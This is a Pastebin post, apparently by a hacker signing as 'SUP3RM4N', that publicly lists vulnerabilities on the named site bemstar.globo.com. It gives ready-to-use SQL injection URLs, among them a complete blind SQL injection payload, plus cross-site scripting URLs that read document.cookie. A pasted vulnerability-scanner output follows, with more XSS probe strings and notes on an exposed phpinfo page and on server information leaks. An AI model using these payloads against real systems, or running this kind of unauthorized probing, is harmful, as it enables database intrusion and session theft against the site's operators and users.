supermanavc

bemstar.globo.com

Apr 15th, 2013
400
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. BEMSTAR.GLOBO.COM - SUP3RM4N
  2. ---------------------------------------------------------------------------
  3. + Target IP: 201.7.176.72
  4. + Target Hostname: bemstar.globo.com
  5. + Target Port: 80
  6. + Start Time: 2013-04-15 21:28:06 (GMT-3)
  7. ---------------------------------------------------------------------------
  8.  
  9. VUL BOOLEAN BASED IN SQL INJECTION:http://bemstar.globo.com/bem2/index.php?modulo=fique&tipo=-1+OR+17-7%3d10
  10.  
  11. Error:http://bemstar.globo.com/bem2/includes/corpoevida_mat.inc.php?id=1
  12.  
  13. Programming error msg:http://bemstar.globo.com/bem2/index.php?modulo=colunistas_mat&url_n_art=44&url_col=Dr.+Osmar+de+Oliveira%20And%20(Select%201)=1
  14.  
  15. Blin sql db found:http://bemstar.globo.com/bem2/index.php?modulo=fique&tipo=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
  16.  
  17. XSS:http://bemstar.globo.com/index.php/%22%3E%3Cscript%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C
  18.  
  19. PHPINFO:http://bemstar.globo.com/phpinfo.php
  20.  
  21. SERVER LEAK:http://bemstar.globo.com/icons/README
  22.  
  23. PHPINFO XSS COOKIE ATTACK:http://bemstar.globo.com/phpinfo.php?GLOBALS[test]=%3Cscript%3Ealert(document.cookie);%3C/script%3E
  24.  
  25.  
  26. + Server: No banner retrieved
  27. + Cookie PHPSESSID created without the httponly flag
  28. + The anti-clickjacking X-Frame-Options header is not present.
  29. + Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
  30. + DEBUG HTTP verb may show server debugging information. See http://msdn.microso
  31. ft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  32. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to X
  33. ST
  34. + /index.php?option=search&searchword=<script>alert(document.cookie);</script>:
  35. Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http
  36. ://www.cert.org/advisories/CA-2000-02.html.
  37. + OSVDB-32774: /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Conta
  38. ins PHP configuration information and is vulnerable to Cross Site Scripting (XSS
  39. ).
  40. + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3
  41. and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-20
  42. 00-02.html.
  43. + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(d
  44. ocument.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XS
  45. S). http://www.cert.org/advisories/CA-2000-02.html.
  46. + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(docum
  47. ent.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&Se
  48. archContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ p
  49. ublish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/adviso
  50. ries/CA-2000-02.html.
  51. + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0
  52. b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/C
  53. A-2000-02.html.
  54. + OSVDB-20406: /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</scrip
  55. t>: PHP contains a flaw that allows a remote cross site scripting attack.
  56. + OSVDB-24484: /phpinfo.php?cx[]=W4rVuBFizbKiUE5acnZlqbjT4JT87W8bSqYZxXyERERuv0u
  57. PvAdGBcZwICnliF64RzstBrqTb3dKwla434thV7Y8HCdobDgSErexpadlKVtmhXtZOcYPyGjRX9pB3ex
  58. ZqMkqzw4UdBWF1qXcb5w2yUciPpzj7d5hK8plC8hXC9y3RAkRUFEFX60C5pZUrxabBONz0YgqrsXVQAq
  59. GbDuvBOfxRTCQ0udEoStq3dDMwcoIUPgRBtRnjUCgLq3xJCPaTd5d2o809NOSV0099qd7NyUzIlxtpLJ
  60. KiuWj6hFEZuNUD5YQgyICD89K9J0bK3PWd7X8jVjK8gzmHlEKHF6NnnrBOw1cnRbPGjL5CHhT3U3LIjG
  61. dIoPzqf7uTmM5OS1155CCVcXcEZMJ8OQ6V5YW72Cj1Hdtu4GFhcrfZkSjeRYSlW5QkWjTGgytbOOZKFI
  62. psdOtwiIqvDtRD4vmoTetgLHUMGNiOcNuisYR6ykfAeQmcTo7WFMKUEY7D805RsLDO4NZeRI1Ymd59j7
  63. 8dMGOzkr5ZJX7UyB6sXPske1wCssNuBiWTwkN6qnnrPN9WPtG6MhWG0B3QN3g8eDA0YKShW823BmXPWG
  64. JZ005xKSsnp8jTZ1G1ZBdL4iHfX7nlPG5NTvDZlw5o7wKvYukPcf48mxtTAbfaG79BsYi6XhRpvFuCwf
  65. dH0FFTAJ2d0muR0JPTwdQN06coXGoJfEvjEyjqQUATt60XzuBxEJ6Ue64IDlrj5dWK4bj1teQ02uKOqs
  66. rPfESdCwY9t4yJeALw2w2S714ZwhHLUSSuqM3lrLURcYLd9BKw7dP6HN3KxTR0D9VB9ywShosrjL5WBe
  67. d4Bx8Jq97zvoiFvRcH75cgX8GR5QAYDB0SCpnGMV69zv3MIGNGP83UCRexChljy2v31q2Lw4qyHCgfGv
  68. mSz854ECegJLuOXXB8wQCJIFYkDL4Ubm30n9iWKAne3GagKYL3xAEdE1clTDCweqBe6UKBS6R402zo4Q
  69. W9jaILYx5XLA7J81d5mOv5iHsOLvVLnuDbRQpQyN8RlCO6tFGwyUIhwZpRjrsUoZShXtlNzwocuoX460
  70. iSSTuZnPy3oPse7yf1bAdTtDquQeP1bQSVi72XWacCyie4RzPmTnFi0bkHP6Md98NQwCyMB8de7a8CaB
  71. eGeFt69lL9EE9RHZWb71g0112V9ov2TkEK6YmifuSCj9k0PIIXnHs47gy9yBNmbBJKcr7LQ9mgzyKFOJ
  72. 7woCqj7sfMY2oxrqJh2TziN0sDXsQKdCAH2ovZwl74RENomZokQMzAhRUIP662Q7aFXm4f6QFIr1uIVB
  73. YiFfYhFI1Tir2fQ9p1ArvaV2YNHnZaoKjZk2IRHIBVfZcZAKnO8geIl6CNrDSih3KEsDJKl902m19OM9
  74. GqB4IKYsHBelKBrjaRp50iRu8O5ow8mHuGLNs3ICTwoHcsWtXGmawJOknfFDUhzWrQb1XkLgng4zT9bD
  75. 3wggkb1rIK6X1vWxLwcYM9zgRWbuwSP4XfQsvHzLAaecxXhlaMUwv2UCz4oCNKPcE4Cs7fTm1GBScGGm
  76. X2ffKoOsiAcOtLozEGSDkGCtyXB8LEtITbTk9xy7lOQyjQ2V36G1iLJug0lO2JlJkshCoFL5yunY9Nx9
  77. qPUibasYKhMnPGcR7xGEbUjXiKATNmZhUIbOfsiC9DBXZcgJEu7zgklwsa5L9aJx93VyJ93h7ijlrR17
  78. QOoepOiJtHfI6KnemvkbVBO0RX9Y4afXam66pfSGjGeuAySUebm088VV6FcXPvZkBsBk6n6CsVZyzWoe
  79. 2zO0IW1p6Th2IcAuEN4GmPgWWzeX3ap0xzcN383VEx0DKrEOntpE4cTejcss3oGd4uSDyJc63RKPWl5T
  80. m0mj9WRcFPXrEGg0s3UvEEWLczIjoX4pHkorAqgJCPOYV1sF6ncXQI3RrLQvdb4f2JOtlWwRk1QK0iSC
  81. SZqfCFzvIVSpwSOqzXEssGkLsAH92hovfO1iv9QXrZkKvLk8YaK8XJENe9LccGb4bdeE5IsDCgvQlwVI
  82. uSKUX6JtnKgyI6FdbU3xXNj8LtuJiGbET22OyG5qcN8yQ3B2g4hPKLAbTK93BHYAu1NyTiytt79dQWXK
  83. Zgv27TIGAB68yXql5AZt9FdCyXQ9254Juq3mLlrFX1NXvJ0T3TmBxpsWjXxGLIsylW4EpcLmDjr8Ncnk
  84. iwsCi3UL8ajLoX0SKBuoNr16Mf0XNrzXdryOH3wvX321kSQAnAZKIXKq5YgnXrQbM3Ld2JwMftpI0onF
  85. rs4w0yO0M5M0H7KBt8XqFmojZGPLTmiiHfYbuWnFDxR4xg7XjULKV4V1HoyLtxANrlKR3HPoWHEvXA49
  86. PXE9eXbZtFzXiBuDsxdkDnUlun1SvI0f8jNeZXuqRYEfU7zt75Y18mzNFKEpMaBsOndfFYvHYenaUyC5
  87. izr1y14dlpZYmnP81ZG7LL6mvK5WViLqo2K6TzZdWni6TGVPqmKrM2t4BdVrBEmzlVQEb88yp3z03jod
  88. e9Mqim6IYKMaBN6PC3uJuNCacgCxxq37anRYSgJgSRliGPTzeGb4VtP8ld1c54ZxvwTC88nT5u6HzL0o
  89. Htc1B3rGox88rdzD3pBAIinTUYjP2wU15tCDHhpdoh7bpJrH8jpHiXiLb2ZQUVpl09jAoQXhXTTOPnwd
  90. BUzuBf18gPXy1GzozmTcVjBzdc99xQ2NRg78mcJL3TOperKmqpNvxb8XQsoYqItcORRskLOB0cWwtKzC
  91. MYd9wPEs1kSLquBnWAoVkL2K36uGE1XFm78qbyufvUFAtyuocJ4HcWmrHopiKD6bonjkTyjEwCAdyerx
  92. 8Z3yMZ57ZdqsKQtYFCgs0X1aSof2GH6aMuhXYrLjra1VHOP1vam5XLPqUt29T7lQIIr0IMgLaeu3ECcs
  93. KKFbaUdeqz9hitnj3B3tYmFmMPUWHdVAMs6j8dWxRMwMXJDpqtoMIvp6rI7gXvBQuQiJlp4s5BUI1HSa
  94. 13wZYmbcN8Kpzg6QkQJll8UfAXOKG77MxtfPM2VZ6GcnKcBlgMCIHW4mj9xg7EFzdieIgxUZ4oFSHVwf
  95. NpY40irlMUafzR52OsRGuKFQZG7cEUCDYSBfTxdX2mznibhQCjipDwZnFnjnUBSKkK3O1WO5E3oWA1mN
  96. uDxiRxZyrIN2LjAXYZGW5GZMJU3WMBNQLAijor2vamRtzhkOyYEtOPLfThK0e9f6lJ89rLNvfmCFGBWZ
  97. btRTXnpPjWtpjIKRF3k9jWb0C9WdxmznAF0ojcw4H1Z7sjyyEXYghjqAKBupxsCXY9zJF7XDg6SH7QdK
  98. OdX9G811C0I99NNT5VPqUOQlLaqrL5zd92V6TzKcL1P2T53xeoNzTUCcuAMeUNJQd2i4jEGceIPjh1Fl
  99. bmjWwVZlh9OF7x7G5ciEmn9eCCvSSaaXk1YZLhU3t1dWWSnWoYV8uCMG1AqhgZnaw2bOAhFOXQrWZev1
  100. gaWpb9u57VWI5SoVap68ZcNd9AIeVVHpm1V4ZEr85ma4Y8BjczFn0882ZG3YndwOT9cmqK8ECZ1RCVFC
  101. 7nCBIbNcXVh25eL4CCT86TiEXlcfKnxfT4swdf9M4yXUL3u9MSTYDxXjUla65uqM4huvCdT1RcsMaD6e
  102. bLT3EYrUKkbSrbQVI6MA5RXjoTVr5PdC9ynfPqkXk1gJBhAApYbsQPzci4hnnqMKyUy3S0v30AftpuIN
  103. iMkr5IhoFzdIS50hMUtFyK7ZGyIyKsAL2MEy40QKcGfgtqnWK2WTCCBIOT36wIQONGls55nh52Cr4VFI
  104. UbwdSqGijYpSDImujznrtfcb3IpmEXVEgCDN9Wm1JyKj6OnrPVwtxIYLlbpMbRu0k4noiOUh3OLvSglu
  105. 7FjcHzDwLjg6FPZb8CJufBTEQkZa1d2Cw64SlQl6Domo9ZiKhNnaTMaPb6GHzLsYRWUsVsDiO8RoJmCo
  106. RvOddIPIIvVbDSYPwjIvUfe4FCJsuSpZw5k2bIikznyjjr9DqI9jOVbw7lIEzmoArgYIQWhRqScrMeSZ
  107. Y7EKa9QVCejFazBljaBZeuHGvFhAdXkFaRtnxtNH9BQPr9kCo<script>alert(foo)</script>: PH
  108. P 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS
  109. + Server leaks inodes via ETags, header found with file /icons/README, inode: 19
  110. 9917, size: 4872, mtime: 0x41a4dc9b
  111. + OSVDB-3233: /icons/README: Apache default file found.
  112.  
  113. #SUP3RM4N
RAW Paste Data